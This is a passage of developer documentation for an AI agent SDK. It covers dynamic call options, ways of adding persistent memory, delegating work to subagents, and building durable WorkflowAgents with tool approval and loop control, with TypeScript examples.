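// Type error: accountType must be 'free' | 'pro' | 'enterprise'
await supportAgent.generate({
prompt: 'How do I upgrade my account?',
options: { userId: 'user_123', accountType: 'premium' },
});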
Modifying Agent Settings
Use prepareCall to modify any agent setting. Return only the settings you want to change.
Dynamic Model Selection
Choose models based on request characteristics:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: __MODEL__, // Default model
callOptionsSchema: z.object({
complexity: z.enum(['simple', 'complex']),
}),
prepareCall: ({ options, ...settings }) => ({
...settings,
model:
options.complexity === 'simple' ? 'openai/gpt-4o-mini' : 'openai/o1-mini',
}),
});
// Use faster model for simple queries
await agent.generate({
prompt: 'What is 2+2?',
options: { complexity: 'simple' },
});
// Use more capable model for complex reasoning
await agent.generate({
prompt: 'Explain quantum entanglement',
options: { complexity: 'complex' },
});
Dynamic Tool Configuration
Configure tools based on runtime inputs:
import { openai } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const newsAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userCity: z.string().optional(),
userRegion: z.string().optional(),
}),
tools: {
web_search: openai.tools.webSearch(),
},
prepareCall: ({ options, ...settings }) => ({
...settings,
tools: {
web_search: openai.tools.webSearch({
searchContextSize: 'low',
userLocation: {
type: 'approximate',
city: options.userCity,
region: options.userRegion,
country: 'US',
},
}),
},
}),
});
await newsAgent.generate({
prompt: 'What are the top local news stories?',
options: {
userCity: 'San Francisco',
userRegion: 'California',
},
});
Provider-Specific Options
Configure provider settings dynamically:
import { OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: 'openai/o3',
callOptionsSchema: z.object({
taskDifficulty: z.enum(['low', 'medium', 'high']),
}),
prepareCall: ({ options, ...settings }) => ({
...settings,
providerOptions: {
openai: {
reasoningEffort: options.taskDifficulty,
} satisfies OpenAILanguageModelResponsesOptions,
},
}),
});
await agent.generate({
prompt: 'Analyze this complex scenario...',
options: { taskDifficulty: 'high' },
});
Advanced Patterns
Retrieval Augmented Generation (RAG)
Fetch relevant context and inject it into your prompt:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const ragAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
query: z.string(),
}),
prepareCall: async ({ options, ...settings }) => {
// Fetch relevant documents (this can be async)
const documents = await vectorSearch(options.query);
return {
...settings,
instructions: `Answer questions using the following context:
${documents.map(doc => doc.content).join('\n\n')}`,
};
},
});
await ragAgent.generate({
prompt: 'What is our refund policy?',
options: { query: 'refund policy' },
});
The prepareCall function can be async, enabling you to fetch data before configuring the agent.
Combining Multiple Modifications
Modify multiple settings together:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userRole: z.enum(['admin', 'user']),
urgency: z.enum(['low', 'high']),
}),
tools: {
readDatabase: readDatabaseTool,
writeDatabase: writeDatabaseTool,
},
prepareCall: ({ options, ...settings }) => ({
...settings,
// Upgrade model for urgent requests
model: options.urgency === 'high' ? __MODEL__ : settings.model,
// Limit tools based on user role
activeTools:
options.userRole === 'admin'
? ['readDatabase', 'writeDatabase']
: ['readDatabase'],
// Adjust instructions
instructions: `You are a ${options.userRole} assistant.
${options.userRole === 'admin' ? 'You have full database access.' : 'You have read-only access.'}`,
}),
});
await agent.generate({
prompt: 'Update the user record',
options: {
userRole: 'admin',
urgency: 'high',
},
});
Using with createAgentUIStreamResponse
Pass call options through API routes to your agent:
import { createAgentUIStreamResponse } from 'ai';
import { myAgent } from '@/ai/agents/my-agent';
export async function POST(request: Request) {
const { messages, userId, accountType } = await request.json();
return createAgentUIStreamResponse({
agent: myAgent,
messages,
options: {
userId,
accountType,
},
});
}
Next Steps
- Learn about loop control for execution management
- Explore workflow patterns for complex multi-step processes
title: Memory
description: Add persistent memory to your agent using provider-defined tools, memory providers, or a custom tool.
Memory
Memory lets your agent save information and recall it later. Without memory, every conversation starts fresh. With memory, your agent builds context over time, recalls previous interactions, and adapts to the user.
Three Approaches
You can add memory to your agent with the AI SDK in three ways, each with different tradeoffs:
| Approach | Effort | Flexibility | Provider Lock-in |
|---|---|---|---|
| Provider-Defined Tools | Low | Medium | Yes |
| Memory Providers | Low | Low | Depends on memory provider |
| Custom Tool | High | High | No |
Provider-Defined Tools
Provider-defined tools are tools where the provider specifies the tool's inputSchema and description, but you provide the execute function. The model has been trained to use these tools, which can result in better performance compared to custom tools.
Anthropic Memory Tool
The Anthropic Memory Tool gives Claude a structured interface for managing a /memories directory. Claude reads its memory before starting tasks, creates and updates files as it works, and references them in future conversations.
import { anthropic } from '@ai-sdk/anthropic';
import { ToolLoopAgent } from 'ai';
const memory = anthropic.tools.memory_20250818({
execute: async action => {
// `action` contains `command`, `path`, and other fields
// depending on the command (view, create, str_replace,
// insert, delete, rename).
// Implement your storage backend here.
// Return the result as a string.
},
});
const agent = new ToolLoopAgent({
model: 'anthropic/claude-haiku-4.5',
tools: { memory },
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
The tool receives structured commands (view, create, str_replace, insert, delete, rename), each with a path scoped to /memories. Your execute function maps these to your storage backend (the filesystem, a database, or any other persistence layer).
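As one illustration, here's a minimal in-memory backend for the execute function. It covers only a few commands, and the action field names (such as file_text) are assumptions; check the provider's types before relying on them.
import { anthropic } from '@ai-sdk/anthropic';
// In-memory stand-in for a real storage backend.
const files = new Map<string, string>();
const memory = anthropic.tools.memory_20250818({
execute: async (action: any) => {
switch (action.command) {
case 'view':
return files.get(action.path) ?? `${action.path} not found`;
case 'create':
files.set(action.path, action.file_text ?? '');
return `Created ${action.path}`;
case 'delete':
files.delete(action.path);
return `Deleted ${action.path}`;
default:
// str_replace, insert, and rename omitted for brevity.
return `Unsupported command: ${action.command}`;
}
},
});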
When to use this: you want memory with minimal implementation effort and are already using Anthropic models. The tradeoff is provider lock-in, since this tool only works with Claude.
Memory Providers
Another approach is to use a provider that has memory built in. These providers wrap an external memory service and expose it through the AI SDK's standard interface. Memory storage, retrieval, and injection happen transparently, and you do not define any tools yourself.
Letta
Letta provides agents with persistent long-term memory. You create an agent on Letta's platform (cloud or self-hosted), configure its memory there, and use the AI SDK provider to interact with it. Letta's agent runtime handles memory management (core memory, archival memory, recall).
pnpm add @letta-ai/vercel-ai-sdk-provider
import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';
const agent = new ToolLoopAgent({
model: lettaCloud(),
providerOptions: {
letta: {
agent: { id: 'your-agent-id' },
},
},
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
You can also use Letta's built-in memory tools alongside custom tools:
import { lettaCloud } from '@letta-ai/vercel-ai-sdk-provider';
import { ToolLoopAgent } from 'ai';
const agent = new ToolLoopAgent({
model: lettaCloud(),
tools: {
core_memory_append: lettaCloud.tool('core_memory_append'),
memory_insert: lettaCloud.tool('memory_insert'),
memory_replace: lettaCloud.tool('memory_replace'),
},
providerOptions: {
letta: {
agent: { id: 'your-agent-id' },
},
},
});
const stream = agent.stream({
prompt: 'What do you remember about me?',
});
See the Letta provider documentation for full setup and configuration.
Mem0
Mem0 adds a memory layer on top of any supported LLM provider. It automatically extracts memories from conversations, stores them, and retrieves relevant ones for future prompts.
pnpm add @mem0/vercel-ai-provider
import { createMem0 } from '@mem0/vercel-ai-provider';
import { ToolLoopAgent } from 'ai';
const mem0 = createMem0({
provider: 'openai',
mem0ApiKey: process.env.MEM0_API_KEY,
apiKey: process.env.OPENAI_API_KEY,
});
const agent = new ToolLoopAgent({
model: mem0('gpt-4.1', { user_id: 'user-123' }),
});
const { text } = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
Mem0 works across multiple LLM providers (OpenAI, Anthropic, Google, Groq, Cohere). You can also manage memories explicitly:
import { addMemories, retrieveMemories } from '@mem0/vercel-ai-provider';
await addMemories(messages, { user_id: 'user-123' });
const context = await retrieveMemories(prompt, { user_id: 'user-123' });
See the Mem0 provider documentation for full setup and configuration.
Supermemory
Supermemory is a long-term memory platform that adds persistent, self-growing memory to your AI applications. It provides tools that handle saving and retrieving memories automatically through semantic search.
pnpm add @supermemory/tools
__PROVIDER_IMPORT__;
import { supermemoryTools } from '@supermemory/tools/ai-sdk';
import { ToolLoopAgent } from 'ai';
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: supermemoryTools(process.env.SUPERMEMORY_API_KEY!),
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
Supermemory works with any AI SDK provider. The tools give the model addMemory and searchMemories operations that handle storage and retrieval.
See the Supermemory provider documentation for full setup and configuration.
Hindsight
Hindsight provides agents with persistent memory through five tools: retain, recall, reflect, getMentalModel, and getDocument. It can be self-hosted with Docker or used as a cloud service.
pnpm add @vectorize-io/hindsight-ai-sdk @vectorize-io/hindsight-client
__PROVIDER_IMPORT__;
import { HindsightClient } from '@vectorize-io/hindsight-client';
import { createHindsightTools } from '@vectorize-io/hindsight-ai-sdk';
import { ToolLoopAgent } from 'ai';
import { openai } from '@ai-sdk/openai';
const client = new HindsightClient({ baseUrl: process.env.HINDSIGHT_API_URL });
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: createHindsightTools({ client, bankId: 'user-123' }),
instructions: 'You are a helpful assistant with long-term memory.',
});
const result = await agent.generate({
prompt: 'Remember that my favorite editor is Neovim',
});
The bankId identifies the memory store and is typically a user ID. In multi-user apps, call createHindsightTools inside your request handler so each request gets the right bank. Hindsight works with any AI SDK provider.
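A rough per-request setup might look like this (the route shape and request body fields are assumptions; derive the user ID from your own session handling):
import { ToolLoopAgent, createAgentUIStreamResponse } from 'ai';
import { HindsightClient } from '@vectorize-io/hindsight-client';
import { createHindsightTools } from '@vectorize-io/hindsight-ai-sdk';
__PROVIDER_IMPORT__;
const client = new HindsightClient({ baseUrl: process.env.HINDSIGHT_API_URL });
export async function POST(request: Request) {
const { messages, userId } = await request.json();
const agent = new ToolLoopAgent({
model: __MODEL__,
// Created per request so each user gets their own memory bank.
tools: createHindsightTools({ client, bankId: userId }),
});
return createAgentUIStreamResponse({ agent, uiMessages: messages });
}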
See the Hindsight provider documentation for full setup and configuration.
When to use memory providers: these providers are a good fit when you want memory without building any storage infrastructure. The tradeoff is that the provider controls memory behavior, so you have less visibility into what gets stored and how it is retrieved. You also take on a dependency on an external service.
Custom Tool
Building your own memory tool from scratch is the most flexible approach. You control the storage format, the interface, and the retrieval logic. This requires the most upfront work but gives you full ownership of how memory works, with no provider lock-in and no external dependencies.
There are two common patterns:
- Structured actions: you define explicit operations (view, create, update, search) and handle structured input yourself. Safe by design since you control every operation (see the sketch below).
- Bash-backed: you give the model a sandboxed bash environment to compose shell commands (cat, grep, sed, echo) for flexible memory access. More powerful but requires command validation for safety.
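A hypothetical sketch of the structured-actions pattern, backed by an in-memory Map (a real implementation would persist to a database or filesystem, and likely use semantic search instead of substring matching):
import { tool } from 'ai';
import { z } from 'zod';
const store = new Map<string, string>();
export const memoryTool = tool({
description: 'Save and recall information across conversations.',
inputSchema: z.discriminatedUnion('action', [
z.object({ action: z.literal('view'), key: z.string() }),
z.object({ action: z.literal('create'), key: z.string(), value: z.string() }),
z.object({ action: z.literal('update'), key: z.string(), value: z.string() }),
z.object({ action: z.literal('search'), query: z.string() }),
]),
execute: async input => {
switch (input.action) {
case 'view':
return store.get(input.key) ?? 'Not found.';
case 'create':
case 'update':
store.set(input.key, input.value);
return `Saved ${input.key}`;
case 'search':
// Naive substring search for illustration only.
return [...store.entries()]
.filter(([key, value]) => key.includes(input.query) || value.includes(input.query))
.map(([key, value]) => `${key}: ${value}`)
.join('\n');
}
},
});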
For a full walkthrough of implementing a custom memory tool with a bash-backed interface, AST-based command validation, and filesystem persistence, see the Build a Custom Memory Tool recipe.
title: Subagents
description: Delegate context-heavy tasks to specialized subagents while keeping the main agent focused.
Subagents
A subagent is an agent that a parent agent can invoke. The parent delegates work via a tool, and the subagent executes autonomously before returning a result.
How It Works
- Define a subagent with its own model, instructions, and tools
- Create a tool that calls it for the main agent to use
- Subagent runs independently with its own context window
- Return a result (optionally streaming progress to the UI)
- Control what the model sees using toModelOutput to summarize
When to Use Subagents
Subagents add latency and complexity. Use them when the benefits outweigh the costs:
| Use Subagents When | Avoid Subagents When |
|---|---|
| Tasks require exploring large amounts of information | Tasks are simple and focused |
| You need to parallelize independent research | Sequential processing suffices |
| Context would grow beyond model limits | Context stays manageable |
| You want to isolate tool access by capability | All tools can safely coexist |
Why Use Subagents?
Offloading Context-Heavy Tasks
Some tasks require exploring large amounts of information—reading files, searching codebases, or researching topics. Running these in the main agent consumes context quickly, making the agent less coherent over time.
With subagents, you can:
- Spin up a dedicated agent that uses hundreds of thousands of tokens
- Have it return only a focused summary (perhaps 1,000 tokens)
- Keep your main agent's context clean and coherent
The subagent does the heavy lifting while the main agent stays focused on orchestration.
Parallelizing Independent Work
For tasks like exploring a codebase, you can spawn multiple subagents to research different areas simultaneously. Each returns a summary, and the main agent synthesizes the findings—without paying the context cost of all that exploration.
Specialized Orchestration
A less common but valid pattern is using a main agent purely for orchestration, delegating to specialized subagents for different types of work. For example:
- An exploration subagent with read-only tools for researching codebases
- A coding subagent with file editing tools
- An integration subagent with tools for a specific platform or API
This creates a clear separation of concerns, though context offloading and parallelization are the more common motivations for subagents.
Basic Subagent Without Streaming
The simplest subagent pattern requires no special machinery. Your main agent has a tool that calls another agent in its execute function:
import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Define a subagent for research tasks
const researchSubagent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a research agent.
Summarize your findings in your final response.`,
tools: {
read: readFileTool, // defined elsewhere
search: searchTool, // defined elsewhere
},
});
// Create a tool that delegates to the subagent
const researchTool = tool({
description: 'Research a topic or question in depth.',
inputSchema: z.object({
task: z.string().describe('The research task to complete'),
}),
execute: async ({ task }, { abortSignal }) => {
const result = await researchSubagent.generate({
prompt: task,
abortSignal,
});
return result.text;
},
});
// Main agent uses the research tool
const mainAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant that can delegate research tasks.',
tools: {
research: researchTool,
},
});
This works well when you don't need to show the subagent's progress in the UI. The tool call blocks until the subagent completes, then returns the final text response.
Handling Cancellation
When the user cancels a request, the abortSignal propagates to the subagent. Always pass it through to ensure cleanup:
execute: async ({ task }, { abortSignal }) => {
const result = await researchSubagent.generate({
prompt: task,
abortSignal, // Cancels subagent if main request is aborted
});
return result.text;
},
If you abort the signal, the subagent stops executing and throws an AbortError. The main agent's tool execution fails, which stops the main loop.
To avoid errors about incomplete tool calls in subsequent messages, use convertToModelMessages with ignoreIncompleteToolCalls:
import { convertToModelMessages } from 'ai';
const modelMessages = await convertToModelMessages(messages, {
ignoreIncompleteToolCalls: true,
});
This filters out tool calls that don't have corresponding results. Learn more in the convertToModelMessages reference.
Streaming Subagent Progress
When you want to show incremental progress as the subagent works, use preliminary tool results. This pattern uses a generator function that yields partial updates to the UI.
How Preliminary Tool Results Work
Change your execute function from a regular function to an async generator (async function*). Each yield sends a preliminary result to the frontend:
execute: async function* ({ /* input */ }) {
// ... do work ...
yield partialResult;
// ... do more work ...
yield updatedResult;
}
Building the Complete Message
Each yield replaces the previous output entirely (it does not append). This means you need a way to accumulate the subagent's response into a complete message that grows over time.
The readUIMessageStream utility handles this. It reads each chunk from the stream and builds an ever-growing UIMessage containing all parts received so far:
import { readUIMessageStream, tool } from 'ai';
import { z } from 'zod';
const researchTool = tool({
description: 'Research a topic or question in depth.',
inputSchema: z.object({
task: z.string().describe('The research task to complete'),
}),
execute: async function* ({ task }, { abortSignal }) {
// Start the subagent with streaming
const result = await researchSubagent.stream({
prompt: task,
abortSignal,
});
// Each iteration yields a complete, accumulated UIMessage
for await (const message of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
yield message;
}
},
});
Each yielded message is a complete UIMessage containing all the subagent's parts up to that point (text, tool calls, and tool results). The frontend simply replaces its display with each new message.
Controlling What the Model Sees
Here's where subagents become powerful for context management. The full UIMessage with all the subagent's work is stored in the message history and displayed in the UI. But you can control what the main agent's model actually sees using toModelOutput.
How It Works
The toModelOutput function maps the tool's output to the tokens sent to the model:
const researchTool = tool({
description: 'Research a topic or question in depth.',
inputSchema: z.object({
task: z.string().describe('The research task to complete'),
}),
execute: async function* ({ task }, { abortSignal }) {
const result = await researchSubagent.stream({
prompt: task,
abortSignal,
});
for await (const message of readUIMessageStream({
stream: result.toUIMessageStream(),
})) {
yield message;
}
},
toModelOutput: ({ output: message }) => {
// Extract just the final text as a summary
const lastTextPart = message?.parts.findLast(p => p.type === 'text');
return {
type: 'text',
value: lastTextPart?.text ?? 'Task completed.',
};
},
});
With this setup:
- Users see: The full subagent execution—every tool call, every intermediate step
- The model sees: Just the final summary text
The subagent might use 100,000 tokens exploring and reasoning, but the main agent only consumes the summary. This keeps the main agent coherent and focused.
Write Subagent Instructions for Summarization
For toModelOutput to extract a useful summary, your subagent must produce one. Add explicit instructions like this:
const researchSubagent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a research agent. Complete the task autonomously.
IMPORTANT: When you have finished, write a clear summary of your findings as your final response.
This summary will be returned to the main agent, so include all relevant information.`,
tools: {
read: readFileTool,
search: searchTool,
},
});
Without this instruction, the subagent might not produce a comprehensive summary. It could simply say "Done", leaving toModelOutput with nothing useful to extract.
Rendering Subagents in the UI (with useChat)
To display streaming progress, check the tool part's state and preliminary flag.
Tool Part States
| State | Description |
|---|---|
| `input-streaming` | Tool input being generated |
| `input-available` | Tool ready to execute |
| `output-available` | Tool produced output (check `preliminary`) |
| `output-error` | Tool execution failed |
Detecting Streaming vs Complete
const hasOutput = part.state === 'output-available';
const isStreaming = hasOutput && part.preliminary === true;
const isComplete = hasOutput && !part.preliminary;
Type Safety for Subagent Output
Export types alongside your agents for use in UI components:
import { ToolLoopAgent, InferAgentUIMessage } from 'ai';
export const mainAgent = new ToolLoopAgent({
// ... configuration with researchTool
});
// Export the main agent message type for the chat UI
export type MainAgentMessage = InferAgentUIMessage<typeof mainAgent>;
Render Messages and Subagent Output
This example uses the types defined above to render both the main agent's messages and the subagent's streamed output:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MainAgentMessage } from '@/lib/agents';
export function Chat() {
const { messages } = useChat<MainAgentMessage>();
return (
<div>
{messages.map(message =>
message.parts.map((part, i) => {
switch (part.type) {
case 'text':
return <p key={i}>{part.text}</p>;
case 'tool-research':
return (
<div key={i}>
{part.state !== 'input-streaming' && (
<div>Research: {part.input.task}</div>
)}
{part.state === 'output-available' && (
<div>
{part.output.parts.map((nestedPart, i) => {
switch (nestedPart.type) {
case 'text':
return <p key={i}>{nestedPart.text}</p>;
default:
return null;
}
})}
</div>
)}
</div>
);
default:
return null;
}
}),
)}
</div>
);
}
Caveats
No Tool Approvals in Subagents
Subagent tools cannot use needsApproval. All tools must execute automatically without user confirmation.
Subagent Context is Isolated
Each subagent invocation starts with a fresh context window. This is one of the key benefits of subagents: they don't inherit the accumulated context from the main agent, which is exactly what allows them to do heavy exploration without bloating the main conversation.
If you need to give a subagent access to the conversation history, the messages are available in the tool's execute function alongside abortSignal:
execute: async ({ task }, { abortSignal, messages }) => {
const result = await researchSubagent.generate({
messages: [
...messages, // The main agent's conversation history
{ role: 'user', content: task }, // The specific task for this invocation
],
abortSignal,
});
return result.text;
},
Use this sparingly since passing full history defeats some of the context isolation benefits.
Streaming Adds Complexity
The basic pattern (no streaming) is simpler to implement and debug. Only add streaming when you need to show real-time progress in the UI.
title: WorkflowAgent description: Build durable, resumable agents with the WorkflowAgent from @ai-sdk/workflow.
WorkflowAgent
The WorkflowAgent from @ai-sdk/workflow is designed for building durable, resumable agents that run inside Vercel Workflows. It provides the same agent loop as the ToolLoopAgent, but adds automatic state persistence, tool schema serialization, and built-in tool approval flows that survive workflow step boundaries.
Why Durable Agents?
A standard ToolLoopAgent runs entirely in memory — if the process crashes, all progress is lost. For production agents that make multiple tool calls, this creates problems:
- Statefulness — Long-running agent loops need to persist state across process boundaries
- Resumability — If a step fails, you want to retry from the last checkpoint, not restart from scratch
- Human-in-the-loop — Tools that require user approval need to pause the agent and resume later
- Observability — Each tool call runs as a discrete workflow step, visible in dashboards
WorkflowAgent solves these by running inside a Vercel Workflow, where each tool execution is a durable step with automatic retries.
When to Use WorkflowAgent vs ToolLoopAgent
| | ToolLoopAgent | WorkflowAgent |
|---|---|---|
| Package | `ai` | `@ai-sdk/workflow` |
| Runtime | In-memory | Vercel Workflow |
| Durability | Lost on crash | Survives restarts |
| Tool retries | Manual | Automatic (via workflow steps) |
| Human approval | Built-in | Built-in + survives suspension |
| `generate()` method | Available | Not available |
| `stream()` method | Available | Primary API |
| Stream output | `streamText` return value | `writable` parameter with `ModelCallStreamPart` |
For simpler use cases that don't need durability, use ToolLoopAgent from the ai package.
Installation
npm install @ai-sdk/workflow workflow
@ai-sdk/workflow requires the ai package and zod as peer dependencies. The workflow package provides the Workflow DevKit runtime (getWritable, 'use workflow', 'use step').
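If they are not already in your project, install the peer dependencies as well:
npm install ai zod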
Creating a WorkflowAgent
Define an agent by instantiating the WorkflowAgent class with a model, instructions, and tools:
import { WorkflowAgent } from "@ai-sdk/workflow";
import { tool } from "ai";
import { z } from "zod";
const agent = new WorkflowAgent({
model: "anthropic/claude-sonnet-4-6",
instructions: "You are a helpful assistant.",
tools: {
weather: tool({
description: "Get weather for a location",
inputSchema: z.object({
location: z.string(),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
}),
}),
},
});
Model Resolution
The model parameter accepts two forms:
// String — AI Gateway model ID
new WorkflowAgent({ model: "anthropic/claude-sonnet-4-6" });
// Provider instance
import { openai } from "@ai-sdk/openai";
new WorkflowAgent({ model: openai("gpt-4o") });
Using the Agent in a Workflow
WorkflowAgent is designed to run inside a workflow function. The key integration points are:
- Mark your function with `'use workflow'`
- Pass `getWritable()` to the agent's `stream()` method
- Start the workflow from your API route
End-to-End Example
import { WorkflowAgent, type ModelCallStreamPart } from "@ai-sdk/workflow";
import { convertToModelMessages, tool, type UIMessage } from "ai";
import { getWritable } from "workflow";
import { z } from "zod";
export async function chat(messages: UIMessage[]) {
"use workflow";
const modelMessages = await convertToModelMessages(messages);
const agent = new WorkflowAgent({
model: "anthropic/claude-sonnet-4-6",
instructions: "You are a flight booking assistant.",
tools: {
searchFlights: tool({
description: "Search for available flights",
inputSchema: z.object({
origin: z.string(),
destination: z.string(),
date: z.string(),
}),
execute: searchFlightsStep,
}),
bookFlight: tool({
description: "Book a specific flight",
inputSchema: z.object({
flightId: z.string(),
passengerName: z.string(),
}),
execute: bookFlightStep,
}),
},
});
const result = await agent.stream({
messages: modelMessages,
writable: getWritable<ModelCallStreamPart>(),
});
return { messages: result.messages };
}
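The API route then starts the workflow and streams its output back to the client. The file below is assumed to live at app/api/chat/route.ts, matching the /api/chat endpoint used by the transport example later on this page: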
import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import { createUIMessageStreamResponse, type UIMessage } from "ai";
import { start } from "workflow/api";
import { chat } from "@/workflow/agent-chat";
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const run = await start(chat, [messages]);
return createUIMessageStreamResponse({
stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
});
}
Message Conversion
WorkflowAgent.stream() expects ModelMessage[], not UIMessage[]. When receiving messages from the client (via useChat), convert them first:
import { convertToModelMessages, type UIMessage } from "ai";
export async function chat(messages: UIMessage[]) {
"use workflow";
const modelMessages = await convertToModelMessages(messages);
const result = await agent.stream({
messages: modelMessages,
// ...
});
}
Writable Streams
Unlike ToolLoopAgent where you consume the returned stream, WorkflowAgent writes raw ModelCallStreamPart chunks to a writable stream provided by the workflow runtime via getWritable(). At the response boundary, use createModelCallToUIChunkTransform() to convert these into UIMessageChunk objects for the client:
import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import { createUIMessageStreamResponse } from "ai";
// Convert raw model stream parts → UI message chunks
return createUIMessageStreamResponse({
stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
});
Resumable Streaming with WorkflowChatTransport
Workflow functions can time out or be interrupted by network failures. WorkflowChatTransport is a ChatTransport implementation that handles these interruptions automatically — it detects when a stream ends without a finish event and reconnects to resume from where it left off.
"use client";
import { useChat } from "@ai-sdk/react";
import { WorkflowChatTransport } from "@ai-sdk/workflow";
import { useMemo } from "react";
export default function Chat() {
const transport = useMemo(
() =>
new WorkflowChatTransport({
api: "/api/chat",
maxConsecutiveErrors: 5,
initialStartIndex: -50, // On page refresh, fetch last 50 chunks
}),
[],
);
const { messages, sendMessage } = useChat({ transport });
// ... render chat UI
}
The transport requires your POST endpoint to return an x-workflow-run-id response header, and a GET endpoint at {api}/{runId}/stream for reconnection:
import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import { createUIMessageStreamResponse, type UIMessage } from "ai";
import { start } from "workflow/api";
import { chat } from "@/workflow/agent-chat";
export async function POST(request: Request) {
const { messages }: { messages: UIMessage[] } = await request.json();
const run = await start(chat, [messages]);
return createUIMessageStreamResponse({
stream: run.readable.pipeThrough(createModelCallToUIChunkTransform()),
headers: {
"x-workflow-run-id": run.runId,
},
});
}
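The GET endpoint serves stream reconnections at {api}/{runId}/stream (assuming a file at app/api/chat/[runId]/stream/route.ts):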
import { createModelCallToUIChunkTransform } from "@ai-sdk/workflow";
import type { NextRequest } from "next/server";
import { getRun } from "workflow/api";
export async function GET(
request: NextRequest,
{ params }: { params: Promise<{ runId: string }> },
) {
const { runId } = await params;
const startIndex = Number(
new URL(request.url).searchParams.get("startIndex") ?? "0",
);
const run = await getRun(runId);
const readable = run
.getReadable({ startIndex })
.pipeThrough(createModelCallToUIChunkTransform());
return new Response(readable, {
headers: {
"Content-Type": "text/event-stream",
"Cache-Control": "no-cache",
Connection: "keep-alive",
"x-workflow-run-id": runId,
},
});
}
For the full API reference, see WorkflowChatTransport.
Tools as Workflow Steps
Mark tool execute functions with 'use step' to make them durable workflow steps. This gives each tool call:
- Automatic retries — Failed tool calls are retried automatically (default: 3 attempts)
- Persistence — Results survive process restarts
- Observability — Each tool call appears as a discrete step in the workflow dashboard
async function searchFlightsStep(input: {
origin: string;
destination: string;
date: string;
}) {
"use step";
const response = await fetch(`https://api.flights.example/search?...`);
return response.json();
}
async function bookFlightStep(input: {
flightId: string;
passengerName: string;
}) {
"use step";
const response = await fetch("https://api.flights.example/book", {
method: "POST",
body: JSON.stringify(input),
});
return response.json();
}
Tools without 'use step' still work but run as regular in-memory functions without durability guarantees.
Tool Approval
Tools can require human approval before execution. When a tool has needsApproval set, the agent pauses and emits an approval request to the writable stream. The workflow suspends until the user approves or denies:
const agent = new WorkflowAgent({
model: "anthropic/claude-sonnet-4-6",
tools: {
bookFlight: tool({
description: "Book a flight",
inputSchema: z.object({
flightId: z.string(),
passengerName: z.string(),
}),
needsApproval: true, // Always require approval
execute: bookFlightStep,
}),
cancelBooking: tool({
description: "Cancel a booking",
inputSchema: z.object({ bookingId: z.string() }),
// Conditional approval based on input
needsApproval: async (input) => {
return input.bookingId.startsWith("VIP-");
},
execute: cancelBookingStep,
}),
},
});
Because the workflow is durable, the approval request survives process restarts — the user can approve hours later and the agent will resume.
Loop Control
Control how many steps the agent can take:
import { isStepCount } from "ai";
const result = await agent.stream({
messages,
stopWhen: isStepCount(10), // Stop after 10 LLM calls
});
If you want the agent to keep running until it has finished calling tools, you can also use isLoopFinished():
import { isLoopFinished } from "ai";
const result = await agent.stream({
messages,
stopWhen: isLoopFinished(),
});
isLoopFinished() lets the agent run until all tool calls have completed, but you should still pair it with a step limit such as isStepCount() to avoid runaway loops, as sketched below. See https://ai-sdk.dev/v7/docs/reference/ai-sdk-core/loop-finished#isloopfinished.
By default, the agent loops until the model stops calling tools (no maximum).
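In the core generate functions, stopWhen also accepts an array of conditions; assuming the same holds for WorkflowAgent, you can combine both:
import { isLoopFinished, isStepCount } from "ai";

const result = await agent.stream({
  messages,
  // finish naturally, but never exceed 20 steps (safety cap)
  stopWhen: [isLoopFinished(), isStepCount(20)],
});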
Structured Output
Parse agent responses into typed objects using Output:
import { Output } from "@ai-sdk/workflow";
import { z } from "zod";
const result = await agent.stream({
messages,
output: Output.object({
schema: z.object({
sentiment: z.enum(["positive", "neutral", "negative"]),
summary: z.string(),
}),
}),
});
console.log(result.output); // { sentiment: 'positive', summary: '...' }
Configuration Options
WorkflowAgent accepts the same generation settings as ToolLoopAgent (temperature, maxOutputTokens, topP, etc.) plus workflow-specific options.
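For example, a minimal sketch applying a couple of these settings (values are illustrative):
const agent = new WorkflowAgent({
  model: "anthropic/claude-sonnet-4-6",
  instructions: "You are a helpful assistant.",
  temperature: 0.3, // lower temperature for more deterministic answers
  maxOutputTokens: 2048, // cap the response length
});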
prepareCall
Called once before the agent loop starts. Use it to transform model, instructions, or other settings based on runtime context:
const agent = new WorkflowAgent({
model: "anthropic/claude-sonnet-4-6",
prepareCall: async ({ model, tools, messages }) => {
return {
instructions: `Current time: ${new Date().toISOString()}`,
};
},
});
prepareStep
Called before each step (LLM call). Use it to modify settings, manage context, or inject messages dynamically:
const agent = new WorkflowAgent({
model: "anthropic/claude-sonnet-4-6",
prepareStep: async ({ stepNumber, messages }) => {
if (stepNumber > 5) {
return { toolChoice: "none" }; // Force text response after 5 steps
}
return {};
},
});
Both prepareCall and prepareStep can also be passed per-call in stream().
